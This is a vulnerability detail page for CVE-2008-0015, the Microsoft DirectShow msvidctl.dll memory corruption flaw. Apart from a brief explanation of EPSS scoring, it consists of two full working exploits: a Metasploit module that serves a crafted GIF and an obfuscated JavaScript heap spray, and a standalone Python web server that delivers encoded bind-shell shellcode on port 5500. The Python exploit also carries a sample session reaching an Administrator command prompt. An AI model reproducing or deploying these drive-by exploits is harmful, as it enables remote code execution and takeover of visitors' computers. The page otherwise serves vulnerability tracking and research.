CVE-2008-0015 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # $Id: msvidctl_mpeg2.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## ## # msvidctl_mpeg2.rb # # Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption exploit for the Metasploit Framework # # Tested successfully on the following platforms (fully patched 06/07/09): # - Internet Explorer 6, Windows XP SP2 # - Internet Explorer 7, Windows XP SP3 # # Original exploit was found in-the-wild used to preform drive-by attacks via compromised Chinese web sites. # The original exploit can be found here (shellcode changed to execute calc.exe): # http://www.rec-sec.com/exploits/aa.rar # # Trancer # http://www.rec-sec.com ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption', 'Description' => %q{ This module exploits a memory corruption within the MSVidCtl component of Microsoft DirectShow (BDATuner.MPEG2TuneRequest). By loading a specially crafted GIF file, an attacker can overrun a buffer and execute arbitrary code. ClassID is now configurable via an advanced option (otherwise randomized) - I)ruid }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer <mtrancer[at]gmail.com>' ], 'Version' => '$Revision: 9179 $', 'References' => [ [ 'CVE', '2008-0015' ], [ 'OSVDB', '55651' ], [ 'BID', '35558' ], [ 'MSB', 'MS09-032' ], [ 'MSB', 'MS09-037' ], [ 'URL', 'http://www.microsoft.com/technet/security/advisory/972890.mspx' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x09\x0a\x0d'\\", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] ], 'DisclosureDate' => 'Jul 05 2009', 'DefaultTarget' => 0)) register_advanced_options( [ OptString.new('ClassID', [ false, "Specific ClassID to use (otherwise randomized)", nil ]), ], self.class) @javascript_encode_key = rand_text_alpha(rand(10) + 10) end def on_request_uri(cli, request) if (request.uri.match(/\.gif$/i)) print_status("Sending GIF to #{cli.peerhost}:#{cli.peerport}...") gif = "\x00\x03\x00\x00\x11\x20\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" gif << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" gif << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" gif << "\xFF\xFF\xFF\xFF" # End of SEH chain gif << [target.ret].pack('V') # SE Handler gif << "\x00" send_response(cli, gif, { 'Content-Type' => 'image/gif' }) return end if (!request.uri.match(/\?\w+/)) send_local_redirect(cli, "?#{@javascript_encode_key}") return end print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...") # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Class IDs allclsids = [ # all IDs from the advisory "011B3619-FE63-4814-8A84-15A194CE9CE3", # doesn't work "0149EEDF-D08F-4142-8D73-D23903D21E90", # doesn't work "0369B4E5-45B6-11D3-B650-00C04F79498E", # works "0369B4E6-45B6-11D3-B650-00C04F79498E", # works "055CB2D7-2969-45CD-914B-76890722F112", # works "0955AC62-BF2E-4CBA-A2B9-A63F772D46CF", # works "15D6504A-5494-499C-886C-973C9E53B9F1", # works "1BE49F30-0E1B-11D3-9D8E-00C04F72D980", # doesn't work "1C15D484-911D-11D2-B632-00C04F79498E", # doesn't work "1DF7D126-4050-47F0-A7CF-4C4CA9241333", # doesn't work "2C63E4EB-4CEA-41B8-919C-E947EA19A77C", # doesn't work "334125C0-77E5-11D3-B653-00C04F79498E", # doesn't work "37B0353C-A4C8-11D2-B634-00C04F79498E", # doesn't work "37B03543-A4C8-11D2-B634-00C04F79498E", # doesn't work "37B03544-A4C8-11D2-B634-00C04F79498E", # doesn't work "418008F3-CF67-4668-9628-10DC52BE1D08", # doesn't work "4A5869CF-929D-4040-AE03-FCAFC5B9CD42", # doesn't work "577FAA18-4518-445E-8F70-1473F8CF4BA4", # doesn't work "59DC47A8-116C-11D3-9D8E-00C04F72D980", # works "7F9CB14D-48E4-43B6-9346-1AEBC39C64D3", # doesn't work "823535A0-0318-11D3-9D8E-00C04F72D980", # doesn't work "8872FF1B-98FA-4D7A-8D93-C9F1055F85BB", # doesn't work "8A674B4C-1F63-11D3-B64C-00C04F79498E", # works "8A674B4D-1F63-11D3-B64C-00C04F79498E", # works "9CD64701-BDF3-4D14-8E03-F12983D86664", # doesn't work "9E77AAC4-35E5-42A1-BDC2-8F3FF399847C", # doesn't work "A1A2B1C4-0E3A-11D3-9D8E-00C04F72D980", # doesn't work "A2E3074E-6C3D-11D3-B653-00C04F79498E", # doesn't work "A2E30750-6C3D-11D3-B653-00C04F79498E", # works "A8DCF3D5-0780-4EF4-8A83-2CFFAACB8ACE", # doesn't work "AD8E510D-217F-409B-8076-29C5E73B98E8", # doesn't work "B0EDF163-910A-11D2-B632-00C04F79498E", # doesn't work "B64016F3-C9A2-4066-96F0-BD9563314726", # works "BB530C63-D9DF-4B49-9439-63453962E598", # doesn't work "C531D9FD-9685-4028-8B68-6E1232079F1E", # doesn't work "C5702CCC-9B79-11D3-B654-00C04F79498E", # doesn't work "C5702CCD-9B79-11D3-B654-00C04F79498E", # doesn't work "C5702CCE-9B79-11D3-B654-00C04F79498E", # doesn't work "C5702CCF-9B79-11D3-B654-00C04F79498E", # doesn't work "C5702CD0-9B79-11D3-B654-00C04F79498E", # doesn't work "C6B14B32-76AA-4A86-A7AC-5C79AAF58DA7", # works "CAAFDD83-CEFC-4E3D-BA03-175F17A24F91", # doesn't work "D02AAC50-027E-11D3-9D8E-00C04F72D980", # doesn't work "F9769A06-7ACA-4E39-9CFB-97BB35F0E77E", # works "FA7C375B-66A7-4280-879D-FD459C84BB02", # doesn't work ] clsids = [ # these all work "0369B4E5-45B6-11D3-B650-00C04F79498E", # works "0369B4E6-45B6-11D3-B650-00C04F79498E", # works "055CB2D7-2969-45CD-914B-76890722F112", # works "0955AC62-BF2E-4CBA-A2B9-A63F772D46CF", # works "15D6504A-5494-499C-886C-973C9E53B9F1", # works "59DC47A8-116C-11D3-9D8E-00C04F72D980", # works "8A674B4C-1F63-11D3-B64C-00C04F79498E", # works "8A674B4D-1F63-11D3-B64C-00C04F79498E", # works "A2E30750-6C3D-11D3-B653-00C04F79498E", # works "B64016F3-C9A2-4066-96F0-BD9563314726", # works "C6B14B32-76AA-4A86-A7AC-5C79AAF58DA7", # works "F9769A06-7ACA-4E39-9CFB-97BB35F0E77E", # works ] classid = datastore['ClassID'] || clsids[rand(clsids.size)] # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Setup exploit buffers nops = Rex::Text.to_unescape([target.ret].pack('V')) blocksize = 0x40000 fillto = 500 # Randomize the javascript variable names msvidctl = rand_text_alpha(rand(100) + 1) div = rand_text_alpha(rand(100) + 1) j_shellcode = rand_text_alpha(rand(100) + 1) j_nops = rand_text_alpha(rand(100) + 1) j_headersize = rand_text_alpha(rand(100) + 1) j_slackspace = rand_text_alpha(rand(100) + 1) j_fillblock = rand_text_alpha(rand(100) + 1) j_block = rand_text_alpha(rand(100) + 1) j_memory = rand_text_alpha(rand(100) + 1) j_counter = rand_text_alpha(rand(30) + 2) host = Rex::Socket.source_address(cli.peerhost) + ":" + datastore["SRVPORT"] gif_uri = "http#{(datastore['SSL'] ? 's' : '')}://#{host}" if ("/" == get_resource[-1,1]) gif_uri << get_resource[0, get_resource.length - 1] else gif_uri << get_resource end gif_uri << "/" + Time.now.to_i.to_s + ".gif" js = %Q|#{j_shellcode}=unescape('#{shellcode}'); #{j_nops}=unescape('#{nops}'); #{j_headersize}=20; #{j_slackspace}=#{j_headersize}+#{j_shellcode}.length; while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops}; #{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace}); #{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace}); while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock}; #{j_memory}=new Array(); for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode}; var #{msvidctl}=document.createElement('object'); #{div}.appendChild(#{msvidctl}); #{msvidctl}.width='1'; #{msvidctl}.height='1'; #{msvidctl}.data='#{gif_uri}'; #{msvidctl}.classid='clsid:#{classid}';| js_encoded = encrypt_js(js, @javascript_encode_key) html = %Q|<html> <body> <div id="#{div}"> <script> #{js_encoded} </script> </body> </html>| print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response(cli, html, { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end end

#!/usr/bin/env python ###################################################################################### # MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890) # ###################################################################################### # # # Written by SecureState R&D Team # # Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin # # http://www.securestate.com # # # # win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind # # # ###################################################################################### # Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7 # ###################################################################################### # # # This exploit is publicly being exploited in the wild, opted to release this # # to the research community. Microsoft is aware of the vulnerability. # # # ###################################################################################### # # # [-] Exploit sent... [-] # # [-] Wait about 30 seconds and attempt to connect.[-] # # [-] Connect to IP Address: 10.211.55.140 and port 5500 [-] # # # # relik@sslinuxvm1:~$ telnet 10.211.55.140 5500 # # Trying 10.211.55.140... # # Connected to 10.211.55.140. # # Escape character is '^]'. # # Microsoft Windows [Version 5.2.3790] # # (C) Copyright 1985-2003 Microsoft Corp. # # # # C:\Documents and Settings\Administrator\Desktop> # # # # # # NOTE: The javascript code is not obfuscated in anyway, normal A/V should pick this # # up. This is intentional. # # # # Improved reliability, appears to be about 95 percent of the time. Adjusted the # # spray size a bit. # # # ###################################################################################### from BaseHTTPServer import HTTPServer from BaseHTTPServer import BaseHTTPRequestHandler import sys,binascii try: import psyco psyco.full() except ImportError: pass class myRequestHandler(BaseHTTPRequestHandler): try: def do_GET(self): # Always Accept GET self.printCustomHTTPResponse(200) # trigger the overflow *boom* if self.path == "/ohn0es.jpg": unhex=binascii.unhexlify("000300001120340000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0c0c0c0c00") self.wfile.write(unhex) if self.path == "/": target=self.client_address[0] self.wfile.write("""<html><head>""") self.wfile.write(""" <script language="JavaScript" defer> function Check() { // win32_bind - EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai http://metasploit.com */ var shellcode = unescape("%ud9db%u74d9%uf424%uc929%u51b1%u02bf%u6c21%u588e%u7831%u8317%u04c0%u7a03%u8e32%u867b%ua55e%u9ec9%uc666%ua12d%ub2f9%u79be%u4fde%ubd7b%u2c95%uc581%u23a8%u7a02%u30b3%ua44a%uadc2%u2f3c%ubaf0%uc1be%u7cc8%ub159%ubdaf%uce2e%uf76e%ud1c2%ue3b2%uea29%ud066%u79f9%u9362%ua5a5%u4f6d%u2e3f%uc461%u6f4b%udb66%u8ca0%u50ba%ufebf%u7ae6%u3da1%u59d7%u4a45%u6e5b%u0c0d%u0550%u9061%u92c5%ua0c2%ucd4b%ufe4c%ue17d%u0101%u9f57%u9bf2%u5330%u0bc7%ue0b6%u9415%uf86c%u428a%ueb46%ua9d7%u0b08%u92f1%u1621%uad98%ud1df%uf867%ue075%ud298%u3de2%u276f%uea5f%u118f%u46f3%uce23%u2ba7%ub390%u5314%u55c6%ubef3%uff9b%u4850%u6a82%uee3e%ue45f%ub978%ud2a0%u56ed%u8f0e%u860e%u8bd8%u095c%u84f0%u8061%u7f51%ufd61%u9a3e%u78d4%u33f7%u5218%uef58%u0eb2%udfa6%ud9a8%ua6bf%u6008%ua717%uc643%u8768%u830a%u41f2%u30bb%u0496%uddde%u4f38%uee08%u8830%uaa20%ub4cb%uf284%u923f%ub019%u1c92%u19a7%u6d7e%u5a52%uc62b%uf208%ue659%u15fc%u6361%ue547%ud04b%u4b10%ub725%u01cf%u66c4%u80a1%u7797%u4391%u5eb5%u5a17%u9f96%u08ce%ua0e6%u33d8%ud5c8%u3070%u2d6a%u371a%uffbb%u171c%u0f2c%u9c68%ubcf2%u4b92%u92f3"); var bigblock = unescape("%u9090%u9090"); var headersize = 20; var slackspace = headersize + shellcode.length; while (bigblock.length < slackspace) bigblock += bigblock; var fillblock = bigblock.substring(0,slackspace); var block = bigblock.substring(0,bigblock.length - slackspace); // Original spray size below, use if you want exploit to load faster with higher crash rate. // while (block.length + slackspace < 0x40000) block = block + block + fillblock; while (block.length + slackspace < 0x70000) block = block + block + fillblock; var memory = new Array(); for (i = 0; i < 350; i++){ memory[i] = block + shellcode} var myObject=document.createElement('object'); DivID.appendChild(myObject); myObject.width='1'; myObject.height='1'; myObject.data='./ohn0es.jpg'; // Vulnerable ID myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF'; } </script> </head> <body onload="Check();"> <div id="DivID">""") self.wfile.write("""<title>MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890)</title></head><body>""") self.wfile.write("""<left><body bgcolor="Black"><font color="White"> ############################################################################### <br>MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890) <br>Written by SecureState R&D Team <br>Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin <br>http://www.securestate.com <br>win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind <br>Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7 <br>###############################################################################<br> <br>""") print ("\n\n[-] Exploit sent... [-]\n[-] Wait about 30 seconds and attempt to connect.[-]\n[-] Connect to IP Address: %s and port 5500 [-]" % (target)) # Print custom HTTP Response def printCustomHTTPResponse(self, respcode): self.send_response(respcode) self.send_header("Content-type", "text/html") self.send_header("Server", "myRequestHandler") self.end_headers() # In case of exceptions, pass them except Exception: pass httpd = HTTPServer(('', 80), myRequestHandler) print (""" ##################################################################################### # MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890) # ##################################################################################### # # # Written by SecureState R&D Team # # Authors: David Kennedy (ReL1K), John Melvin (Whipsmack), Steve Austin # # http://www.securestate.com # # # # win32_bind EXITFUNC=seh LPORT=5500 Size=314 Encoder=ShikataGaNai Shell=bind # # # ##################################################################################### # Tested on WinXPSP3, Win2k3SP2, WinXPSP2 on IE6 and IE7 # ##################################################################################### """) print ("[-] Starting MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray [-]") print ("[-] Have someone connect to you on port 80 [-]") print ("\n\nType <control>-c to exit..") try: # handle the connections httpd.handle_request() # Serve HTTP server forever httpd.serve_forever() # Except Keyboard Interrupts and throw custom message except KeyboardInterrupt: print ("\n\nExiting exploit...\n\n") sys.exit(1) # milw0rm.com [2009-07-10]